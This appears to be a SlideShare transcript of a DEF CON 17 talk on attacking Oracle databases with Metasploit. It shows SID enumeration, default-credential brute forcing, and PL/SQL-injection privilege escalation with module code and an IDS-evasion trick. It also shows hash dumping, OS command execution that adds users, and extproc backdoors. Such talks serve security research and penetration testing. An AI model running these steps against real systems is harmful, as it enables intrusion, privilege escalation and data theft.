SlideShare une entreprise Scribd logo

Attacking Oracle with the Metasploit Framework

Chris Gates
Chris Gates
TechnologieBusiness
1  sur  59
Attacking Oracle with the Metasploit Framework defcon 17
Who Are We? Chris Gates <cg [@] metasploit.com> What pays the bills Pentester/Security Consultant Security Blogger http://carnal0wnage.attackresearch.com Security Twit Carnal0wnage Want more? Chris Gates + carnal0wnage + maltego 
Who Are We? Mario Ceballos <mc [@] metasploit.com> What do I do? Vulnerability Research/Exploit Development. Metasploit Framework Developer. Focus is on auxiliary and exploit modules. Pentesting for some company.
Disclaimer
Why Oracle? Why the focus on Oracle? Been on lots of pentests & seen lots of potential targets. The Oracle business model allows for free downloads of products, but you pay for updates. The result is tons of potential shells. Privilege escalation and data theft is pretty easy, but shells are always better.
Why Oracle? Why the focus on Oracle? Some support is provided by the commercial attack frameworks, but really don’t have much coverage for non-memory corruption vulns. Other tools that target Oracle. Inguma Orasploit (not public) Pangolin (if you want to give your hard earned shell back to .cn) A few free commercial products focused on vulnerability assessment rather than exploitation.
Current Metasploit Support Some support for Oracle is already provided. Exploit modules. Handful of memory corruption modules that target earlier versions of Oracle and some of its other applications. Auxiliary modules. Handful of modules that assist in discovering the SID, identifying the version, sql injection (file-format), post exploitation, and a ntlm stealer.
New Metasploit Support Introduction of a TNS Mixin. Handles a basic TNS packet structure. "(CONNECT_DATA=(COMMAND=#{command}))” Used for some of our auxiliary modules. Used for our TNS exploits. Introduction of a ORACLE Mixin. Handles our direct database access. Dependencies: Oracle Instant Client. ruby-dbi. ruby-oci8. http://trac.metasploit.com/wiki/OracleUsage
New Metasploit Support (cont.) Introduction of a ORACLE Mixin. Exposes a few methods. connect() Establishes a database handle. disconnect() Disconnect all database handles. preprare_exec() Prepares a statement then executes it.
New Metasploit Support (cont.) Introduction of a ORACLE Mixin. Really makes things simple. msf auxiliary(sql) > set SQL "select * from global_name" SQL => select * from global_name msf auxiliary(sql) > run [*] Sending SQL... [*] ORCL.REGRESS.RDBMS.DEV.US.ORACLE.COM [*] Done... [*] Auxiliary module execution completed msf auxiliary(sql) >
Oracle Attack Methodology We need 4 things to connect to an Oracle DB. IP. Port. Service Identifier (SID). Username/Password.
Oracle Attack Methodology Locate Oracle Systems. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
Oracle Attack Methodology Locate Oracle Systems Nmap. Information Disclosure Vulns. Google.
Locate Oracle Systems Nmap. Look for common oracle ports 1521-1540,1158,5560 cg@attack:~$ nmap -sV 192.168.0.100 -p 1521 Starting Nmap 4.90RC1 ( http://nmap.org ) Interesting ports on 192.168.0.100: PORT STATE SERVICE VERSION 1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
Locate Oracle Systems Google. Google dorks to locate Oracle systems. intitle:iSQL intitle:Release inurl:isqlplus intitle:10.1 inurl:pls/portal "Index of" "Oracle-HTTP-Server" Server at Port "Last modified" 1.3.12 www.red-database-security.com/wp/google_oracle_hacking_us.pdf Yahoo dorks? to locate Oracle systems. intitle:iSQL intitle:Release inurl:isqlplus inurl:pls/portal “Oracle-HTTP-Server" Server at Port "Last modified" 1.3.12 www.red-database-security.com/wp/yahoo_oracle_hacking_us.pdf
Locate Oracle Systems Sometimes they come pre-0wned. 
Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via PL/SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
Oracle Attack Methodology Determine Oracle Version. tns_packet(“(CONNECT_DATA=(COMMAND=VERSION))”) msf auxiliary(tnslsnr_version) > set RHOSTS 172.10.1.107-172.10.1.110 RHOSTS => 172.10.1.107-172.10.1.110 msf auxiliary(tnslsnr_version) > run [*] Host 172.10.1.107 is running: Solaris: Version 9.2.0.1.0 – Production [*] Host 172.10.1.108 is running: Linux: Version 11.1.0.6.0 - Production [*] Host 172.10.1.109 is running: 32-bit Windows: Version 10.2.0.1.0 - Production [*] Auxiliary module execution completed msf auxiliary(tnslsnr_version) > db_notes [*] Time: Fri May 29 16:09:41 -0500 2009 Note: host=172.10.1.107 type=VERSION Solaris: Version 9.2.0.1.0 – Production … [*] Time: Fri May 29 16:09:44 -0500 2009 Note: host=172.10.1.109 type=VERSION data=32- bit Windows: Version 10.2.0.1.0 - Production msf auxiliary(tnslsnr_version) >
Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
Oracle Attack Methodology Determine Oracle Service Identifier (SID). tns_packet(“(CONNECT_DATA=(COMMAND=STATUS))”) By querying the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_enum) > run [*] Identified SID for 172.10.1.107: PLSExtProc [*] Identified SID for 172.10.1.107 : acms [*] Identified SERVICE_NAME for 172.10.1.107 : PLSExtProc [*] Identified SERVICE_NAME for 172.10.1.107 : acms [*] Auxiliary module execution completed msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.109... [*] Auxiliary module execution completed
Oracle Attack Methodology Determine Oracle SID. By quering the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_brute) > run [*] Starting brute force on 172.10.1.109, using sids from /home/cg/evil/msf3/dev/data/exploits/sid.txt... [*] Found SID 'ORCL' for host 172.10.1.109. [*] Auxiliary module execution completed
Oracle Attack Methodology Determine Oracle SID. By quering the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.108... [*] Auxiliary module execution completed msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/spy_sid msf auxiliary(spy_sid) > run [*] Discovered SID: ‘orcl' for host 172.10.1.108 [*] Auxiliary module execution completed msf auxiliary(spy_sid) >
Oracle Attack Methodology Determine Oracle SID. Enterprise Manger Console.
Oracle Attack Methodology Determine Oracle SID. Enterprise Manager Console. Query other components that may contain it. msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.108... [*] Auxiliary module execution completed msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/oas_sid msf auxiliary(oas_sid) > run [*] Discovered SID: ‘orcl' for host 172.10.1.109 [*] Auxiliary module execution completed msf auxiliary(oas_sid) >
Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
Oracle Attack Methodology Determine Oracle Username/Password. Brute Force For Known Default Accounts. msf auxiliary(login_brute) > set SID ORCL SID => ORCL msf auxiliary(login_brute) > run . [-] ORA-01017: invalid username/password; logon denied [-] ORA-01017: invalid username/password; logon denied [*] Auxiliary module execution completed msf auxiliary(login_brute) > db_notes [*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109 type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER
Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
Oracle Attack Methodology Privilege Escalation via SQL Injection. SQL Injection in default Oracle packages. A good chunk of it executable by public!  Regular SQLI requires CREATE PROCEDURE privilege which most default accounts possess. Cursor SQLI only requires CREATE SESSION privilege.
Privilege Escalation The code. def initialize(info = {})super(update_info(info, 'Name' => 'SQL Injection via SYS.LT.FINDRICSET.', 'Description' => %q{snip... 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision:$', 'References' =>[ [ 'BID', '26098' ],], 'DisclosureDate' => 'Oct 17 2007')) register_options( [ OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),], self.class)
Privilege Escalation The code. name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = "CREATE OR REPLACE FUNCTION #{name} RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '#{datastore['SQL'].upcase}'; COMMIT; RETURN(0); END;"
Privilege Escalation The code. package ="BEGIN SYS.LT.FINDRICSET('.'' #{datastore ['DBUSER']}.#{name}||'''')--',''); END;" clean = "DROP FUNCTION #{name}" .... print_status("Sending first function...") prepare_exec(function) print_status("Attempting sql injection on SYS.LT.FINDRICSET...") prepare_exec(package) print_status("Removing function '#{name}'...") prepare_exec(clean) ....
Privilege Escalation The set-up. msf auxiliary(lt_findricset) > set RHOST 172.10.1.109 RHOST => 172.10.1.109 msf auxiliary(lt_findricset) > set RPORT 1521 RPORT => 1521 msf auxiliary(lt_findricset) > set DBUSER SCOTT DBUSER => SCOTT msf auxiliary(lt_findricset) > set DBPASS TIGER DBPASS => TIGER msf auxiliary(lt_findricset) > set SID ORCL SID => ORACLE msf auxiliary(lt_findricset) > set SQL GRANT DBA TO SCOTT SQL => GRANT DBA TO SCOTT
Privilege Escalation Attacking SYS.LT.FINDRICSET. msf auxiliary(lt_findricset) > set SQL "grant dba to scott" SQL => grant dba to scott msf auxiliary(lt_findricset) > run [*] Sending first function... [*] Done... [*] Attempting sql injection on SYS.LT.FINDRICSET... [*] Done... [*] Removing function 'NBVFICZ'... [*] Done... [*] Auxiliary module execution completed msf auxiliary(lt_findricset) >
Privilege Escalation Success? Before Injection. SQL => select * from user_role_privs msf auxiliary(sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO After Injection. msf auxiliary(sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,DBA,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO
Privilege Escalation Which works, but...
Privilege Escalation This Can Be Solved By Implementing Some Basic Evasion. dos = Rex::Text.encode_base64(package) Which Is Then Decoded On The Remote Side. DECLARE #{rand2} VARCHAR2(32767); BEGIN #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); EXECUTE IMMEDIATE #{rand2}; END;
Privilege Escalation We Bypass The NIDS, But Not So Much The HIPS
Privilege Escalation At least not with that exploit! "select sys.dbms_metadata.get_xml('''||#{datastore['DBUSER']}.#{name}()||''','') from dual"
Privilege Escalation Exploits Initial Coverage. lt_findricset.rb CVE-2007-5511 lt_findricset_cursor.rb CVE-2007-5511 dbms_metadata_open.rb CVE-2006-0260 dbms_cdc_ipublish.rb CVE-2008-3996 dbms_cdc_publish.rb CVE-2008-3995 lt_rollbackworkspace.rb CVE-2009-0978 lt_compressworkspace.rb CVE-2008-3982 lt_mergeworkspace.rb CVE-2008-3983 lt_removeworkspace.rb CVE-2008-3984
Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
Post Exploitation If all I want is the Data after SQLI to DBA we are probably done. sql.rb to run SQL commands. msf auxiliary(sql) > set SQL "select username,password,account_status from dba_users” SQL => select username,password,account_status from dba_users msf auxiliary(sql) > run [*] Sending SQL... [*] SYS,7087B7E95718C0CC,OPEN [*] SYSTEM,66DC0F914CDD83F3,OPEN [*] DBSNMP,E066D214D5421CCC,OPEN [*] SCOTT,F894844C34402B67,OPEN [*] Done... [*] Auxiliary module execution completed msf auxiliary(sql) >
Post Exploitation Data is nice, but shells are better  Several published methods for running OS commands via oracle libraries. Via Java. Extproc backdoors. Dbms_Scheduler. Run custom pl/sql or java.
Post Exploitation Win32Exec Grant user JAVASYSPRIVS using sql.rb. Run win32exec.rb to run system commands. Examples Net User Add TFTP get trojan.exe → execute trojan.exe FTP Batch Scripts Net User Add → metasploit psexec exploit  Ref: http://0xdeadbeef.info/exploits/raptor_oraexec.sql  Ref: Oracle Hacker’s Handbook
Post Exploitation Win32Exec msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd1234 /add“ CMD => net user dba P@ssW0rd1234 /add msf auxiliary(win32exec) > run [*] Creating MSF JAVA class... [*] Done... [*] Creating MSF procedure... [*] Done... [*] Sending command: 'net user dba P@ssW0rd1234 /add‘ [*] Done... [*] Auxiliary module execution completed
Post Exploitation nixExec To be released later.
Post Exploitation FTP Upload Echo over FTP batch script via UTL_FILE, use DBMS_Scheduler to run the script and execute the malware. Demo Video at: http://vimeo.com/2704188  Ref: Red Database Security  Ref: http://www.red-database-security.com/wp/oracle_cheat.pdf
Post Exploitation Perl Backdoor Oracle installs perl with every install. Use UTL_FILE to echo over perl shell line by line. Use one of the other tools to execute perl shell. Easy to use with *nix  Ref: Red Database Security
Post Exploitation Extproc Backdoor via directory traversal.  Allows you to call libraries outside of oracle root. Nix and win32. CVE 2004-1364 9.0.1.1 – 9.0.1.5 9.2.0.1 – 9.2.0.5 10.1.0.2  Ref: http://0xdeadbeef.info/exploits/raptor_oraextproc.sql
Post Exploitation Extproc Backdoor via directory traversal. msf auxiliary(extproc_backdoor_traversal) > set CMD “net user metasploit metasploit /add” CMD => net user metasploit metasploit /add msf auxiliary(extproc_backdoor_traversal) > run [*] Setting up extra required permissions [*] Done... [*] Set msvcrt.dll location to C:oracleora92bin../../../Windowssystem32msvcrt.dll [*] Done... [*] Setting extproc backdoor [*] Running command net user metasploit metasploit /add [*] Done… [*] Auxiliary module execution complete
Post Exploitation Extproc Backdoor via directory traversal.
Post Exploitation Extproc Backdoor via copy dll. “newer” versions will allow you to just copy over the dll into the %ORACLE_HOME%bin directory. CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:Windowssystem32'; CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:Oracleproduct10.1.0db_1BIN'; … CREATE OR REPLACE LIBRARY extproc_shell AS 'C:Oracleproduct10.1.0db_1binmsvcrt.dll'; / Works on newer Oracle 10g/11g.  Ref: Digital Security Research Group  Ref: http://milw0rm.org/exploits/7675
Post Exploitation Win32upload Grant user JAVASYSPRIVS using sql.rb. Run win32upload.rb to download binary from a remote webserver Run win32exec.rb to execute the binary  Ref: Argeniss Advanced SQL Injection in Oracle Databases (Black Hat USA 2005)  Ref: http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip
Post Exploitation DBMS_Schedule Backdoor Run OS commands via DBMS_Scheduler. Module written by Alexandr Polyakov of Digital Security Research Group. Will be added to svn soon.
Post Exploitation Oracle NTLM Stealer Oracle running as admin user not SYSTEM. Have Oracle connect back to MSF, grab halfLM challenge or perform SMB Relay attack. Module writers did a great write up on using the module and when it would be useful.  http://www.dsecrg.com/files/pub/pdf/Penetration_from_application_down_t o _OS_(Oracle%20database).pdf
Breaking Other Oracle Apps Oracle Application Server CGI/Vulnerable URL scanner oas_cgi.rb msf auxiliary(oas_cgi) > run [*] /em/console/logon/logon [*] /em/dynamicImage/emSDK/chart/EmChartBean [*] /servlet/DMSDump [*]/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB- INF/config/soapConfig.xml [*] /servlet/Spy [*] Auxiliary module execution completed
The Way Ahead Exploits For Vulnerable Packages. [*] ORA-03135: connection lost contact PROCEDURE DELETE_REFRESH_OPERATIONS Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- SNAP_OWNER VARCHAR2 IN SNAP_NAME VARCHAR2 IN sploit = rand_text_alpha_upper(576) + "BBBB" + "AAAA" + "xcc" * 500 sql = %Q|BEGIN SYS.DBMS_SNAP_INTERNAL.DELETE_REFRESH_OPERATIONS('MSF', '#{sploit}'); END; | 0:032> !exchain 074fc408: 41414141 Invalid exception stack at 42424242
DEMO
THANKS! Questions?
THANKS! HDM, Richard Evans, JMG, !LSO, Sh2kerr, Rory McCune

Recommandé

Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploitAlberto García Illera
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Emertxe Information Technologies Pvt Ltd
 
rtnetlink
rtnetlinkrtnetlink
rtnetlinkTaku Fukushima
 
Android Multimedia Framework
Android Multimedia FrameworkAndroid Multimedia Framework
Android Multimedia FrameworkPicker Weng
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API SecurityAmila Paranawithana
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEELinaro
 

Recommandé

Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploitAlberto García Illera
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Emertxe Information Technologies Pvt Ltd
 
rtnetlink
rtnetlinkrtnetlink
rtnetlinkTaku Fukushima
 
Android Multimedia Framework
Android Multimedia FrameworkAndroid Multimedia Framework
Android Multimedia FrameworkPicker Weng
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API SecurityAmila Paranawithana
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEELinaro
 
A deep dive into Android OpenSource Project(AOSP)
A deep dive into Android OpenSource Project(AOSP)A deep dive into Android OpenSource Project(AOSP)
A deep dive into Android OpenSource Project(AOSP)Siji Sunny
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
SFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverSFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverLinaro
 
Android audio system(audio_hardwareinterace)
Android audio system(audio_hardwareinterace)Android audio system(audio_hardwareinterace)
Android audio system(audio_hardwareinterace)fefe7270
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Json Web Token - JWT
Json Web Token - JWTJson Web Token - JWT
Json Web Token - JWTPrashant Walke
 
Android Internals
Android InternalsAndroid Internals
Android InternalsOpersys inc.
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Android Internals
Android InternalsAndroid Internals
Android InternalsOpersys inc.
 
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...NGINX, Inc.
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 
Accessing Hardware on Android
Accessing Hardware on AndroidAccessing Hardware on Android
Accessing Hardware on AndroidGary Bisson
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
Embedded Android : System Development - Part IV
Embedded Android : System Development - Part IVEmbedded Android : System Development - Part IV
Embedded Android : System Development - Part IVEmertxe Information Technologies Pvt Ltd
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022MichaelM85042
 
ROS 2 deployment in K8s: DDS Router as WAN comms enabler
ROS 2 deployment in K8s: DDS Router as WAN comms enablerROS 2 deployment in K8s: DDS Router as WAN comms enabler
ROS 2 deployment in K8s: DDS Router as WAN comms enablereProsima
 
LCU14-103: How to create and run Trusted Applications on OP-TEE
LCU14-103: How to create and run Trusted Applications on OP-TEELCU14-103: How to create and run Trusted Applications on OP-TEE
LCU14-103: How to create and run Trusted Applications on OP-TEELinaro
 
mimikatz @ asfws
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfwsBenjamin Delpy
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 

Contenu connexe

Tendances

A deep dive into Android OpenSource Project(AOSP)
A deep dive into Android OpenSource Project(AOSP)A deep dive into Android OpenSource Project(AOSP)
A deep dive into Android OpenSource Project(AOSP)Siji Sunny
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
SFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverSFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverLinaro
 
Android audio system(audio_hardwareinterace)
Android audio system(audio_hardwareinterace)Android audio system(audio_hardwareinterace)
Android audio system(audio_hardwareinterace)fefe7270
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...NGINX, Inc.
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 
Accessing Hardware on Android
Accessing Hardware on AndroidAccessing Hardware on Android
Accessing Hardware on AndroidGary Bisson
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022MichaelM85042
 
ROS 2 deployment in K8s: DDS Router as WAN comms enabler
ROS 2 deployment in K8s: DDS Router as WAN comms enablerROS 2 deployment in K8s: DDS Router as WAN comms enabler
ROS 2 deployment in K8s: DDS Router as WAN comms enablereProsima
 
LCU14-103: How to create and run Trusted Applications on OP-TEE
LCU14-103: How to create and run Trusted Applications on OP-TEELCU14-103: How to create and run Trusted Applications on OP-TEE
LCU14-103: How to create and run Trusted Applications on OP-TEELinaro
 

Tendances (20)

A deep dive into Android OpenSource Project(AOSP)
A deep dive into Android OpenSource Project(AOSP)A deep dive into Android OpenSource Project(AOSP)
A deep dive into Android OpenSource Project(AOSP)
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
SFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverSFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driver
 
Android audio system(audio_hardwareinterace)
Android audio system(audio_hardwareinterace)Android audio system(audio_hardwareinterace)
Android audio system(audio_hardwareinterace)
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malware
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Json Web Token - JWT
Json Web Token - JWTJson Web Token - JWT
Json Web Token - JWT
 
Android Internals
Android InternalsAndroid Internals
Android Internals
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Android Internals
Android InternalsAndroid Internals
Android Internals
 
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
Install and Configure NGINX Unit, the Universal Application, Web, and Proxy S...
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
 
Accessing Hardware on Android
Accessing Hardware on AndroidAccessing Hardware on Android
Accessing Hardware on Android
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak
 
Embedded Android : System Development - Part IV
Embedded Android : System Development - Part IVEmbedded Android : System Development - Part IV
Embedded Android : System Development - Part IV
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 
ROS 2 deployment in K8s: DDS Router as WAN comms enabler
ROS 2 deployment in K8s: DDS Router as WAN comms enablerROS 2 deployment in K8s: DDS Router as WAN comms enabler
ROS 2 deployment in K8s: DDS Router as WAN comms enabler
 
LCU14-103: How to create and run Trusted Applications on OP-TEE
LCU14-103: How to create and run Trusted Applications on OP-TEELCU14-103: How to create and run Trusted Applications on OP-TEE
LCU14-103: How to create and run Trusted Applications on OP-TEE
 

En vedette

Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Oracle Database 12c Attack Vectors
Oracle Database 12c Attack VectorsOracle Database 12c Attack Vectors
Oracle Database 12c Attack VectorsMartin Toshev
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOsama Mustafa
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.jsWebsecurify
 
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?Wayne Huang
 
Web Application Security 101 - 06 Authentication
Web Application Security 101 - 06 AuthenticationWeb Application Security 101 - 06 Authentication
Web Application Security 101 - 06 AuthenticationWebsecurify
 
Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Hykeos
 
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...44CON
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBSqreen
 
